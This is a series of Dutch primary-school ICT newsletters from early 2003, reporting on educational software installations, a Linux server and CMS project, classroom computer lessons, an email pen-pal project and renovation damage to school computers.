Wij ook blij. Arnoud en Niels komen ons helpen. Arnoud woont vlakbij en Niels in Amstelveen.

Dat helpen houdt in:
Als Dirk er op alle manieren niet meer uitkomt (lezen in HOWTO's en FAQ's (Frequently Asked Questions), de nieuwsgroep hem ook niet verder kan helpen, dan kan hij hulp vragen.
Af en toe een uurtje hulp op school indien nodig.
Adviezen.

Welkom Arnoud en Niels. Weet dat we op vrijdagmiddag na schooltijd met het team bij elkaar komen en een drankje drinken. Ook daarbij welkom!

VERKIEZINGEN!!

Lees dit en stuur een mail!

[Afbeelding niet meer online beschikbaar: http://rosaboekdrukker.net/starnet/media/offensief.jpg]

Nieuws: Onderwijsoffensief
GCO fryslân> start een onderwijsoffensief voor de verbetering van de kwaliteit in het onderwijs. Tot nog toe besteden de lijsttrekkers maar minimale aandacht aan de positie van het onderwijs. Door middel van een e-mailactie willen we de politiek duidelijk maken dat dit anders moet. Klik door en u krijgt een voorbeeldbrief onder ogen. Deze brief kunt u met eigen ondertekening versturen naar de lijsttrekkers. Doe het nu en plaats het onderwijs weer op de agenda.

Ga naar de voorbeeldbrief of lees/download het begeleidend artikel onderwijsoffensief nu noodzakelijk.

DE WEBSITE VAN ONZE SCHOOL:

Nieuw: Leerlingen: spelletjes: paar links toegevoegd. Gaarne suggesties.

Hulp voor aanpassing gevraagd:
Het systeem waarmee we de website vullen is niet helemaal perfect. We zoeken hulp om die onvolkomenheden te verhelpen.

Ook in de sectie leerlingen hebben we een pagina oud-leerlingen. Daar worden foto's van oud-leerlingen verzameld. Neem een kijkje bij een aantal foto's van vroeger. Toen waren we nog jong en slank en zo.

AFMELDEN

Als je geen prijs stelt op het ontvangen van deze nieuwsbrief, dan halen we je van de verzendlijst,

Stuur een email.

Veel plezier dit weekend.
Karin
Dirk

2003-01-24 w04

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 4 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

LESSUGGESTIES OP HET INTERNET

Via e-zines (elektronische nieuwsbrieven) kun je op de hoogte blijven van allerlei leuke lestips. Bijvoorbeeld: de aardrijkskunde nieuwsbrief geeft aanvullende internetopdrachten en boekentips en plaatmateriaal die bij onze aardrijkskunde methode horen (De Wereld Dichtbij). Om een idee te geven zijn dit schooljaar een aantal van die e-zines verzameld op onze site. In het gedeelte Leerkrachten>lessuggesties.

CHATTEN MET DE MSM MESSENGER

Er zijn steeds meer kinderen op onze school die thuis met elkaar chatten via het programma Messenger. Op school is het niet toegestaan om dit programma te gebruiken. Wel mogen de kinderen af en toe op onze eigen schoolchat, Rosa's Kletshoek.

SOFTWARE INSTALLEREN

Op veler verzoek zijn we bezig met Clowns op de server te plaatsen. Er zijn leerkrachten in de onderbouw die het programma toch een beetje missen. Verder is Letterpret ook binnengekomen (voor de zoveelste keer) na een boze mail aan Malmberg. Nu de installatie nog. Verslag volgt volgende week.

Deze week zijn we ook voor het eerst aan de slag gegaan met de netwerk versie van Ambrasoft's "tafel totaal". In alle klassen waar het programma nodig is kan het zo van de server gehaald worden. Kinderen uit groepen 4 en 5 zijn reuze enthousiast.

BESTANDEN OPRUIMEN

Karin is druk bezig wat orde te scheppen in alle bestanden van groepen op de fileserver. Zodra ze klaar is ruimen we ook backups op zodat de boel weer op orde is. Let op dat je kinderen in hun eigen groep inloggen en niet in de groep van een ander. Daar kan ook veel verwarring door ontstaan.

GROEP 5.

Deze week is het Karin gelukt om met 18 kinderen uit groep 5 tegelijk een computeropdracht te doen. De opdracht was: schrijf een weettekst. Dat was klassikaal voorbereid en moest in tweetallen op de computer uitgewerkt worden. Inclusief een plaatje invoegen. Er werd met 9 computers gewerkt. Om de beurt werd een alinea voorgelezen en getiept. De meeste kinderen weten nu, dat er een spatie getikt moet worden nà ¥en leesteken. Plaatjes invoegen was iets te hoog gegrepen en kostte teveel tijd om uit te leggen, dus dat hebben ze niet alleen gedaan. De teksten zullen binnenkort te bewonderen zijn op de pagina van groep 5.

ONS CONTENT MANAGEMENT SYSTEM

Karin houdt de website up to date met een CMS dat de stadsdeel 'De Baarsjes' financierde. Er liggen nog een paar wensen en er zitten nog een paar foutjes in. Na een oproep in nl.comp.os.linux.overig (een Linux nieuwsgroep) vonden we Peter Groen bereid naar het CMS te kijken en een bijdrage te leveren. Welkom Peter! (dan hebben we nu 4 Peters in de club:)).

N.B. Dat CMS is gratis te downloaden voor iedereen! http://siteatschool.sourceforge.net/index.php?section=3

DUAL BOOT

We hebben nog één Windows 3.1 computer omdat daar Velig Leren Lezen op staat. Dat kan je er niet zomaar vanaf halen vanwege Zwijsen's verschrikkelijke licentiepolitiek. Op school hebben we weinig ruimte en voor 3 computers is in Hedy's klas (groep 3) geen plek.

Om ruimte te sparen hebben we een dual boot computer gemaakt met Win '98 (Harddisk 1) en Win 3.1 (harddisk 2) Dat deden we met de beste ?partition manager? die we kennen: ?Ranish Partition Manager?. Opzoeken in Google, een aanrader!

PROJEKT K12 LTSP

Dit project is als proefopstelling geprobeerd door Bas (Mrg. Bekkerschool in A'dam Noord en tegenwoordig ook op de Corantijn) en Dirk in Dirk's kelder. Vanaf vandaag hebben we, voor een tijdje, dus een Linux Terminal Server draaien die op veel Amerikaanse lagere scholen gebruikt wordt. Een Terminal Server wil zeggen dat alle programma's op de server staan en dat de werkstations 'leeg' zijn. Geen harddisk, geen floppy. Je kunt ze alleen maar aan/uit zetten. En de werkstations mogen ook oude computers zijn. Dit is je kans om er naar te komen kijken. Bel even voordat je komt zodat we je (w)aardig kunnen ontvangen.

2003-01-31 w05

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 5 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

DIGITALE CAMERA

We proberen al een tijdje te beslissen welke digitale fotocamera we zullen aanschaffen. En eindelijk is er een keus gevallen op een camera die wordt aanbevolen in Computer Idee. En nu is die uitverkocht. Jammer. Want er zat een docking station bij (daarmee kun je de camera direct op je computer aansluiten). Nog even doorzoeken. We willen een camera die kan werken met NiMH oplaadbare batterijen.

COMPUTERREGELS

In elke klas worden de komende week de nieuwe computerregels opgehangen. Graag even bespreken met de leerlingen.

CLOWNS

Een leerkracht uit de kleuterbouw zei laatst, dat ze het programma Clowns eigenlijk wel terug wilde. ?t Was toch wel een leuk voor de kinderen, die spelletjes. Dirk aan de slag met de originele clowns-diskette en de linux-server. En het is gelukt!!! Alleen moet de schermresolutie nogal laag ingesteld worden om een goed beginscherm te krijgen. Ook dat weer opgelost. We zijn eigenlijk heel erg benieuwd naar wat de onderwijswereld Anno 2003 denkt over dit programma. Wat zou er eventueel moeten worden aangepast aan de huidige maatstaven? Waarschijnlijk het automatisch aanpassen aan het niveau van het kind.

OPRUIMEN VAN JE EIGEN FILES

Het blijkt dat er onder de leerkrachten toch nog veel moeilijkheden zijn om documenten netjes op te ruimen. Leerkrachten die veel documenten schrijven zouden nog eens de nascholing van 2001 2002 moeten nakijken (brochure van het ABC: ?word en windows voor beginners?, Hoofdstuk ?werken met de Verkenner? op bladzij 24. Op bladzij 27 staat hoe je nieuwe mappen moet maken) Ook is gebleken, dat het erg belangrijk is om je document een duidelijke titel te geven.

VERKEERSPROGRAMMA/PROJECT VOOR HET BASISONDERWIJS IN DE BAARSJES

Leerlingen van onze school hebben meegewerkt aan een verkeersprogramma voor de basisscholen in de Baarsjes. Lees meer in het ingezonden bericht onderaan deze nieuwsbrief.

GROEP 5

De miniwerkstukjes van groep 5 staan op onze site.

Kostte veel tijd, eerst alle werkstukken uit de mappen van de kinderen halen. Dan de teksten per leerlingenkoppel op de site invoeren. Daarna moesten de plaatjes nog apart worden ingevoerd per verhaaltje. Het wordt tijd dat de kinderen worden ge﮳trueerd hoe ze dat op hun eigen pagina moeten doen.

AMBRASOFT TAFEL TOTAAL

Het draait als een zonnetje. Vorige week hadden we nog problemen met de registratie van de gegevens van de kinderen, maar na aanwijzingen van de helpdesk van Ambrasoft was dat meteen opgelost. (Dirk: de permissies staan nu erg onveilig, dat is weer een probleem dat ik met hulp van Niels en/of Arnoud zal aanpakken)

LETTERPRET

Na de zoveelste nieuwe installatie van Malmberg kan Dirk het programma nog steeds niet installeren. Elke keer wordt er bij de installatie gemeld dat fileserver\edu\Program Files\leesl1

\ccmove.dll er niet is, terwijl die er wel is. Nu is er een boze mail naar Malmberg gestuurd, en een enorme discussie in de nieuwsgroep nl.onderwijs.nieuwe-media gaande over wat te doen met moeilijk te installeren HEEL dure software.

LEESLADDER

De volgende cd-roms van de Leesladder worden nu op de server gezet. Het blijft wennen met het opstarten van het programma. Wat doen we fout? Want we komen elke keer eerst in een soort leerkrachtendeel in plaats van dat het programma meteen voor de kinderen start.

Na uitvoerige en prettige contacten met de een heer van Zwijsen en een heer van het bedrijf dat de beveiliging van de Leesladders doet zijn de problemen nu opgelost. De leesladders lopen goed en je hoeft niet meer als leerkracht in te loggen, maar gewoon met je groepsnaam.

SCHOOLLAN

Bas en Dirk hebben op woensdagavond SchoolLAN op een server gezet. Het installeerde prima ondanks dat Dirk (expres) een paar stommiteiten uithaalde. A.s. Woensdag gaan we proberen SchoolLAN aan het Internet te hangen.

STORING.

In de nacht van dinsdag op woensdag begaf de voeding van de nieuwe fileserver het. Gevolg: kortsluiting, stop doorgeslagen, alle servers uitgevallen. Dirk had gelukkig in 1,5 uur de zaak weer werkend door even bij de leverancier een nieuwe voeding te halen (garantie).

Zo zie je maar hoe handig het is om je leverancier inde buurt te hebben.

Overigens werd ook weer een andere opvatting bevestigd: Goed gebrukte spullen zijn vaak betrouwbaarder dan nieuwe.

Tot zover en goed weekend,
Karin
Dirk

ingezonden bericht:

Het project 'Tussen school en thuis?'

In stadsdeel de Baarsjes doen alle basisscholen mee met het project "Tussen school en thuis?' Doel van dit project is het verkeer op de school-thuisroute van kinderen in heel Amsterdam veiliger te maken*.

Met het oog hierop zijn in het verleden in de Baarsjes d.m.v. enqu괥s de verkeersknelpunten in de schoolomgeving van de kinderen ge﮶entariseerd. Een verkeersdeskundige van het stadsdeel (Angelique Meul) heeft daarna samen met kinderen, leerkrachten en ouders deze knelpunten 'geschouwd' en voor verschillende punten maatregelen bedacht. Die maatregelen zijn natuurlijk niet voldoende. Kinderen moeten ook leren om met ingewikkelde verkeerssituaties om te gaan. Daarom is aan het ABC gevraagd lesmateriaal te ontwikkelen gericht op de knelpunten in de schoolomgeving. Voor de scholen in de Baarsjes is gekozen voor lesmateriaal op de computer.

"Tussen school en thuis?" in stadsdeel de Baarsjes

Dat is de titel van de cd-rom die Monique Korenhof en Margaret Traudes van het ABC op dit moment aan het ontwikkelen zijn. Als de cd-rom opstart komen kinderen al snel via een kaart in hun eigen buurt. Ze kunnen daar verkeersknelpunten op de computer verkennen en de bijbehorende opdrachten op papier maken. Vaak zullen ze voor het antwoord informatie moeten zoeken in de verkeerstheorie op de cd-rom, soms zullen ze even 'in het echt' moeten gaan kijken en soms zullen ze alleen of met z'n tweeë® hun informatie op het internet gaan zoeken. Afwisselende opdrachten dus bij voor de kinderen herkenbare situaties in hun eigen omgeving.

Wensen

We zijn nu nog volop aan het ontwikkelen. Alle ideeë® en wensen zijn welkom. We werken heel veel met foto's. Wil je dat iets speciaals in de omgeving van je eigen school erin komt, of wil je beslist een bepaald onderwerp behandeld hebben, laat het ons weten! Ons plan is om nog vó³² de zomervakantie de testversie van de cd-rom op de scholen uit te proberen.

ABC/OCA

Monique Korenhof

Margaret Traudes

* Het project 'Tussen school en thuis?' wordt aan de scholen aangeboden door stadsdeel de Baarsjes en de dienst Infrastructuur Verkeer en Vervoer van de gemeente Amsterdam (dIVV).

2003-02-07 w06

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 week 6 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

DE EDU-HOEK

VERBOUWING

Er worden nieuwe lokalen op de school gebouwd. Komende week gaat er enorm gebroken worden in onze favoriete ICT plek: de hal op de 1e verdieping.  Het kan dus zijn dat het werken aan de  werkstukken niet zo gemakkelijk zal gaan.

AFSPRAKEN ICT LESSEN

Alle leerkrachten hebben in hun postvakje een overzicht gekregen met daarop de afspraken die gemaakt zijn over de ICT vaardigheden en de lessen die we de komende periode met de kinderen gaan doen. Ook staan de data van de resterende scholingen erop.

EMAIL PROJECT

Volgende week is er een bijeenkomst met het ABC waarin we afspraken maken over het email project dat we met de groepen 3, 4 en 5 gaan doen. Het is een bekend project: het beren project: een beer gaat om de beurt bij de kinderen logeren. Wat beleeft die beer allemaal? We werken samen met de Louis Bouwmeesterschool in Amsterdam. Ook nu emailen al een aantal kinderen uit de klassen 3 en 4, met het groeps-email-adres. We hebben allemaal het volgende adres: groep?@rosaboekdrukker.net  Ook bestaat het emailadres leerkracht@rosaboekdrukker.net Dus geen geheimzinnig gedoe met privé-emailadressen. Nee, alles gaat bij ons OPEN EN BLOOT.

LESSUGGESTIES

Er zijn weer nieuwe e-zines binnen. In de praxis staat een leuk onderwerp van het praxis atelier. Knutselen maar! E-zines zijn gratis en heel informatief. Op onze site

LEESLADDER en LETTERPRET

Alle 4 de cd-roms van Leesladder doen het nu. Letterpret werkt nog steeds niet. Stichting SchoolLAN heeft het programma en onderzoekt het. A.s. Maandag hopen we meer te horen. Als het nog lang duurt ruilen we hem om voor "schatkist met de muis".

ENCYCLOPEDIE

Er bestaat een OpenSource encyclopedie, die gratis te raadplegen is. De Wikipedia. Er is nu ook een Nederlandstalige versie van http://nl.wikipedia.org/wiki/Hoofdpagina Je kunt ook artikelen schrijven voor de encyclopedie.

ICT TOETS

Een gratis te downloaden programma, waarmee getoetst kan worden hoe het met de ICT vaardigheden gaat van??.. http://www.muiswerk.nl/demos/main2b.shtml

VIRUSSEN OP SCHOOL

We zeggen er niets meer over. Bugbear/Jdbgmgr.exe hoax zie: http://www.virusalert.nl/?show=hoax&id=38

DE LINOEKS HOEK

CONTACTEN met TU EINDHOVEN

We hebben twee studenten op bezoek gehad van de Technische Universiteit Eindhoven. Zij gaan ons (en daarmee de wereld) misschien helpen met de verdere ontwikkeling van ons website management systeem, met een type programma en nog wat zaken. Heren, dank voor jullie komst! We hopen dat hun begeleider akkoord gaat met het plan.

SAMBA TIP

Niels Damman, één van onze Linux deskundigen die helpt als we er echt niet meer uitkomen, kwam met een prima tip voor de fileserver: Door de backups, die door BU http://hightek.org  van de /home dirs gemaakt worden, als alleen-lezen bestanden ter beschikking te stellen aan iedereen kan nu veel makkelijker naar verloren documenten gezocht worden. Het komt nogal eens voor dat leerlingen hun werkstuk overschrijven met een lege pagina. Meestal kan het werkstuk gevonden worden in de map van de vorige dag. Bedankt Niels!

We gaan nu aan de borrel, groeten,
Karin
Dirk

2003-02-14 w07

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 7 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

DE EDU-HOEK

FOUTE LINK OP ONZE WEBSITE

Heel prettig, als collega's de site van de Rosa Boekdrukker eens grondig onderzoeken, want:

De Valentijn-pagina op onze schoolwebsite bevatte een link naar een leuk stukje over de geschiedenis van Valentijnsdag. Een leerkracht klikte op de balk onder aan dat stukje: "nog meer valentijn.." en kwam terecht in een reclame voor glijmiddelen. Paniek!! Onmiddellijk de link verwijderd en de webmaster van de internetwijzer-bao gemaild. Zie hier zijn antwoord:

"Beste Karin,

Op mijn pak vla las ik: 'ondanks de zorgvuldigheid waarmee ons product wordt samengesteld, kan het voorkomen dat u een stukje pit aantreft'. Hetzelfde geldt helaas voor een internetsite. Reacties als deze helpen ons de site 'clean' te houden.

Hartelijk dank voor uw reactie!

Vanzelfsprekend hebben we de link verwijderd. Hiervoor in de plaats een link naar wereldkids: http://www.rnw.nl/kids/fun/valentijn/home.html

Excuses voor de uitglijer,

S. K."

COMPUTERS ONDER VUUR

Aan alle kanten wordt in ons schoolgebouw gedrild en geboord. Iedereen wordt er gek van. En de computers moesten worden toegedekt tegen het stof. De servers draaien nog.

ICT-SCHOLING/EMAILPROJECT groep 3 t/m 5

Afgelopen dinsdag was er een ICT scholing voor de groepen 3 t/m 5. Er werd besproken hoe we gaan meedoen aan het BEREN-Email project. We gaan na de krokusvakantie van start. Dat doen we met de Louis Bouwmeester, een Daltonschool in Amsterdam-Slotervaart. We hebben er heel veel zin in!

Half maart zullen er ook klassenconsulten plaatsvinden: hoe gaat het? Waar liggen er eventueel knelpunten m.b.t. het Berenproject..

Dit project maakt deel uit van een veel groter geheel: de doorlopende ICT-leerlijn van groep 1 t/m groep 8.

Verder hebben we gepraat over die doorgaande lijn m.b.t. paint en word. Over de organisatie, en dat het oefenen van de vaardigheden een vast onderdeel in het lesrooster moet zijn. En dat ook in de komende periode hier nog aandacht aan besteed moet worden. (15 minuten per week per kind).

LETTERPRET

De stichting SchoolLan heeft Letterpret onder handen genomen. Binnenkort draait het op onze school..

Heel fijn, want op 11 maart wordt de onderbouw geschoold op het omgaan met het leerkrachten gedeelte ervan.

INLOGGEN: LET OP !!!!

O, dat inloggen!!! Het blijft een probleem. Steeds weer leerlingen en leerkrachten die niet door hebben, dat als je niet goed hebt ingelogd, je niet bij je eigen map kunt komen. Er zijn van die eigenwijze kinderen die even snel op "annuleren" drukken. Karin is weer tijden bezig geweest om zwervende documenten terug te zetten. Er hebben zelfs kinderen het gepresteerd om mappen in de mappen van andere leerlingen onder te brengen. Om gek van te worden.

Wil je a.u.b, s.v.p. , g? (vul in) zelf goed inloggen en de kinderen leren goed in te loggen. Het is gewoon een BASIS ICT VAARDIGHEID.

LINOEKS - HOEK

SCHOOLLAN

Opeens stond Ruud Suk van SchoolLan in de school. Hij was op de deelraad geweest voor een gesprek met vertegenwoordigers van het schoolbestuur en de ICT Academie. Het komt erop neer: SchoolLan regelt alles. (en wij doen de rest)

SERVER

Onze brandnieuwe server waarop SchoolLAN gaat draaien was toch niet helemaal goed afgeleverd. Dat betekende dat Bas en Dirk de proefopstelling van SchoolLAN niet aan een netwerk kregen. Oorzaak: vermoedelijk iets in 't moederbord. We hebben 'm teruggebracht.

Dirk: "Geef mij maar oud materiaal, dan weet je wat je hebt!".

CMS

Peter Groen komt binnenkort met een plek op het internet waarop we een stem kunnen uitbrengen over welk onderdeel we veranderd/aangepast willen hebben.

LINUX ONDERSTEUNING

Deze week nog opent op de Kinkerstraat 92 onze Linux Ondersteuningsgroep zijn deuren. Ze zullen na de opening de SchoolLAN cd bekijken en dan horen we meer.

ICT ACADEMIE

De ICT Academie zoekt een nieuwe stagiaire voor de OBSRB. We hopen op een Linoeks fan met ICT kennis.

DELEGATIE UIT TILBURG

Wij werden vanmiddag (vrijdag) vereerd met bezoek uit Tilburg. Frank van den Oetelaar van Stichting TOWN en Hans Paaijmans, docent aan de Katholieke Universiteit Tilburg bezochten onze school. Temidden van vrijdagmiddag=speelgoedmiddag? en dus lawaaierige kinderen, het gebeuk van pneumatische hamers en stofwolken wisselden wij ICT ervaringen uit. We zijn allen bezig met het ontwikkelen van OSS/GPL programma's voor het onderwijs en de vraag die ons het meeste klemt is:

"Waar is in basisonderwijs de meeste behoefte aan?". Want alle andere ingredië®´en voor het tot stand komen van educatieve programma?s zijn aanwezig: goede ideeën pecunia, menskracht.

Het was goed elkaar in levenden lijve te zien en te spreken. Zo krijgen de namen in de nieuwsgroep een gezicht.

groeten,
Karin
Dirk

2003-02-21 w08

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie nieuwsbrief via Rosa Boekdrukker Jaargang 2 - week 8 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

De EDU HOEK

ARABISCH SCHRIJVEN

Supernieuws voor de arabische OALT leerkrachten!!
Wij kunnen nu Arabisch schrijven op onze gewone Window '98 computers. Het ziet eruit alsof je met Word werkt, maar dan van rechts naar links en uiteraard in het Arabisch. Afbeeldingen toevoegen kan ook. Printen gaat ook goed.
Wat moet je doen:
Het tekstverwerkingsprogramma heet 'Abiword' http://www.abiword.org. Download de BIDI versie (bi-directional) en installeer 'm op je computer. Zet 'm met de instellingen op: van rechts naar links. Download arabische fonts op: http://user.dtcc.edu/~berlin/font/arabic.htm Unzip ze en zet ze in c:\windows\fonts. Herstart de computer, en schrijven maar! Als je hulp nodig hebt, of als je er niet uitkomt, mail dan. Het leuke van de tekstverwerker Abiword is dat hij zowel voor Windows als Linux bestaat. Oh ja, je kunt ook Arabische toetsenborden kopen, gewoon in de winkel.

BERENPROJECT

De Beren zijn in huis. De afspraken zijn gemaakt. Op maandag 3 maart komen de beren in de klas en zullen ze klaargemaakt worden voor een logeerpartij bij kinderen van de Louis Bouwmeesterschool.
Zet maar vast een lekker berenstoeltje klaar. Beertje moet goed naar het bord kunnen kijken.

MOTTO VAN ONZE ICT LEERLIJN

Opeens van de week schoot het eruit: wij werken aan de leerlijn: "van muis tot webpagina".

GESCHIEDENISMETHODE

In de laatste nieuwsbrief van het PRAXIS-bulletin werd een artikel genoemd, waarin staat hoe je in 10 stappen kunt kiezen voor een nieuwe geschiedenismethode. Jammer genoeg was er geen" link" naar het artikel. Op school konden we nergens het bulletin vinden (??!!! #%&*!). Dus gekopieerd op het ABC (onderwijsbegeleidingsdienst) Wel jammer, dat het PRAXIS-bulletin niet net iets meer informatie zet op het internet.
Van de beheerster van het infocentrum van de schoolbegeleidingsdienst kwam de tip: http://www.leermiddelenplein.nl. Het zoeken bij het SLO is gemoderniseerd. Op die site kun je allerlei informatie over methoden vinden. Leuk werk voor de vakantie.

WERKSTUKKEN

Er wordt door de bovenbouw keihard gewerkt aan de werkstukken. Het accent ligt nog op het verzamelen van informatie via boeken en het uitwerken op de computer. Kinderen die al eerder een werkstuk op de computer hebben gemaakt hebben duidelijk een voorsprong.
Wel blijkt weer hoe belangrijk het is om de kinderen goed te begeleiden. Geen onnodige spaties en harde returns: maar wel de juiste commando?s. Er moet meteen bij het begin van het tekstverwerken gelet worden op goede instructies.
Op donderdag 6 maart is er weer een consult van de onderwijsbegeleidingsdienst over dit onderwerp.

SOFTWARE NIEUWS

Letterpret doet het nog steeds niet, ook niet met veel hulp van Malmberg. Bij schoolLan hebben ze het wel aan de praat gekregen.
De Leesladder doet het wel, maar de bediening ervan gaat niet soepel. De leerkracht moet het klaarzetten voor de zorg-leerling. Echt wennen.
De EDUROM Klokkijken werd door Dirk vorige week zonder problemen in een flits op de server ge﮳talleerd. Geen gedonder meer met cd-roms in de computer. Dus roept u maar welke Edurom gewenst is in een klas.
Het programma tafeltotaal (Ambrasoft) is een groot succes in de groepen 4 en 5.

ESIS en DUAL BOOT

Ronald wil met ESIS experimenteren. Dat is ons school administratieprogramma waarin het leerlingvolgsysteem, de financi묥 administratie, de leerlingadministratie en de leerkrachtgegevens in zitten. Het is uiteraard te gevaarlijk om in ons gewone ESISprogramma dingen uit te proberen. Daarom heeft Dirk een tweede harddisk in een van de directiecomputers gezet en daarop Windows + ESIS gezet. Bij het opstarten kun je nu kiezen of je de gewone directiecomputer wil of de ExperimenteerESIS.
Veel plezier en succes Ronald!

CURSUS NIEUWE ONTWIKKELINGEN VOOR ICT COÖRDINATOREN

Deze cursus wordt georganiseerd door onze schoolbegeleidingsdienst: het ABC. Er zijn vijf bijeenkomsten per jaar. Deze week ging het over het gebruik van Intranet. Een Intranet kan een gesloten netwerk zijn dat niet aan andere netwerken verbonden is (zoals internet). Ons eigen CMS blijkt een heel geschikt middel te zijn om een intranet mee te onderhouden. Via inloggen met een wachtwoord is het mogelijk om allerlei informatie te lezen die niet voor iedereen bestemd is. Bijvoorbeeld: wij zouden met s@s (zo heet ons systeem) alle notulen alleen toegankelijk kunnen maken voor leerkrachten. Of een vergaderrooster voor het schooljaar. Of het overzicht van alle ADV?s van de leerkrachten, etc.
Op de bijeenkomst werden ook andere programma?s bekeken die dat ook kunnen.

VERBOUWING

Dirk heeft het weer druk gehad om computers opnieuw aan te sluiten. Er waren computers tijdelijk onder een zeil opgeslagen, omdat er muren afgebroken en opgebouwd werden. Nu maar hopen, dat ze niet al te veel te lijden hebben gehad van het stof.

BAARSJES KRANT

In het maandelijks huis-aan-huis stadsdeelblad stond deze maand een artikel over onze school en ICT.

EEN FIJNE GIFT

Dirk vond in zijn postvakje wat geheugen (RAM). Nu kunnen we weer een paar computers opvoeren en opnieuw inrichten. Bedankt Peter!

DE LINOEKS HOEK

SCHOOLLAN

Aan de stichting SchoolLan is door ons een offerte gevraagd voor het installeren van de schoolLan configuratie op onze servers en het installeren van de door ons meest gebruikte software op die servers. Er is bij ons een grote behoefte aan ondersteuning bij het installeren van die grote programma?s. Bij SchoolLan hebben ze al vaker met dat bijltje gehakt. Dus vooruit met de schuit!!! Niet lullen maar poetsen.
Na deze extra grote BIC kunnen we er wel een weekje uit.

Prettige vakantie!

Karin
Dirk

2003-03-07 w10

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie nieuwsbrief via Rosa Boekdrukker Jaargang 2 - week 10 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

De EDU HOEK

BERENPROJECT

Op maandag kwamen alle beren in de klassen van de groepen 3, 4 en 5. De kinderen reageerden heel enthousiast en begonnen meteen van alles te verzamelen voor de beren. Er vonden verkiezingen plaats voor de namen! Soms twee rondes. A.S. maandagochtend zullen ze in de logeer-klas zijn. En dan sturen we natuurlijk meteen een email dat ze goed zijn aangekomen. Op dinsdag volgt dan de eerste email van de leerlingen.

CONSULT BOVENBOUW

Hoe staat het ervoor met de werkstukken? En hoe staat het ervoor met de ICT leerlijn van de bovenbouw?
Op deze bijeenkomst hebben we gekeken in hoeverre we ons al kunnen houden aan de uitgezette ICT leerlijn. Het blijkt, dat de leerlingen in groep 6 nog veel moeite hebben om informatie uit een tekst te halen. Deze vaardigheid in natuurlijk een voorwaarde om werkstukken te kunnen maken.
In een teamvergadering zal worden besproken, dat het wenselijk is om al na de kerst in groep 5 een beginnetje te maken met een klein werkstukje. Zowel in groep 5 als groep 6 zal de komende tijd in de taallessen extra aandacht besteed moeten worden aan het schrijven van een weettekst, aan het formuleren van zoekvragen, aan het zoeken naar bruikbare stukjes. In de groepen 7 en 8 zal na het zoeken naar informatie in boeken langzaam de overstap worden gemaakt naar het zoeken op internet. Eerst met voorbereidende oefeningen. Het doel aan het einde van groep 8 is:
"De leerlingen zijn in staat zelfstandig een werkstuk te maken met behulp van informatie uit boeken en van internet. Zij maken dat werkstuk met de juiste gebruikmaking van een tekstverwerkingsprogramma". (over blind tikken hebben we het nog maar niet!!!!)

EIGEN PAGINA?S LEERLINGEN

Het is voor leerlingen mogelijk om vanuit thuis met een wachtwoord te werken aan een eigen pagina op het internet. Deze week hebben twee leerlingen uit groep 7 daar instructie voor gehad. Het kost veel tijd om de plaatjes er apart in te zetten. Kinderen razend enthousiast!

ONZE TAAL

Er bestaat een tijdschrift "onze taal". Daarin staat veel informatie voor taalpuristen, taalfanatici en andere belangstellenden voor de Nederlandse taal. Deze week kwam er een mail binnen van de maker ervan: wie wil een gratis abonnement op hun elektronische nieuwsbrief?
Lees meer: www.taalpost.nl:
"vertalen van de bijbel is een heidens karwei" (Provinciale Zeeuwse Krant)

PRAXIS BULLETIN

Weer boordevol interessante informatie. Nu een artikel over integratie vaan taal en aardrijkskunde voor taalzwakke doelgroepen. www.praxisbulletin.nl

E-ZINES

Er kwam weer een nieuwe nieuwsbrief binnen van kennisnet boordevol lessuggesties. Kijk op onze site bij leerkrachten>lessuggesties.

DE HARDWARE HOEK

VERBOUWING

Tijdens de laatste regenbui van de krokusvakantie bleek, dat het dak niet goed dichtgemaakt was. Op verscheiden plaatsen lekkage, twee computers met water er in; in een pentium 450 en 800. Gelukkig alleen één monitor stuk, toetsenborden onder water, maar werkten nog. Nu moeten we elke dag de computers toedekken met plastic folie. ?t Stof kruipt ook al overal in.
En ons rijtje van zes computers op de 1e verdieping en de Arabische computers bij Mohamed moeten een meter uit de muur staan uit voorzorg omdat men al lekkage verwacht het komende weekend!!!

INSTALLATIEBEDRIJF

Tijdens de verbouwing zal de uitbreiding van ons netwerk worden meegenomen. Daar zijn deze week de plannen voor rond gemaakt. Toen in begin jaren 90 bij de voorbereiding van de bouw van ons huidige gebouw geopperd werd om alvast rekening te houden met een computer netwerk, was daar absoluut geen gehoor voor. De t.v. kabels konden wel, maar computers?. neeeee!

DE LINUX HOEK

SCHOOLLAN

De offerte van SchoolLan kwam binnen. Die bestaat uit twee onderdelen:

 1. het opnieuw inrichten van de server(s) en werkstations volgens de schoolLan formule
 2. het geven van scholing m.b.t. de schoolLan formule aan geï®´eresseerden (in dit geval Dirk en Bas). Nog meer?
  We willen volle kracht vooruit. Het is nu even plannen wat het meest geschikte moment zal zijn om "over" te gaan. Het zal waarschijnlijk de meivakantie worden.

CMS

Zoals jullie al eerder lazen wordt het CMS steeds intensiever gebruikt. Nu ook voor leerlingen die thuis aan werkstukken kunnen werken.
Vandaag hadden wij ook Fred Stuurman op bezoek. ICT ouder op de 2e Daltonschool (waar het CMS ook in gebruik is). Hij werkt bij IBM en last but not least, hij schrijft code voor het CMS in samenwerking met Peter Groen die de 'maintainer' is van het CMS. Op het moment dat we dit schrijven zit hij hier en heeft het 'zoeken' al op een andere plek op de site gezet. En er komt nog meer. Zeer bedankt Fred!

Voor zover we weten gebruiken in Nederland deze scholen het CMS:
http://www.waalsdorp.nl
http://www.2edalton.nl

UPS

Ons UPS (uninterrupted power supply) doet 't prima onder Linux, maar een uitbreiding (om er meerdere servers op aan te sluiten) blijkt na veel onderzoek (met goede medewerking van de importeur) niet onder Linux/Unix te werken maar slechts onder Windows.
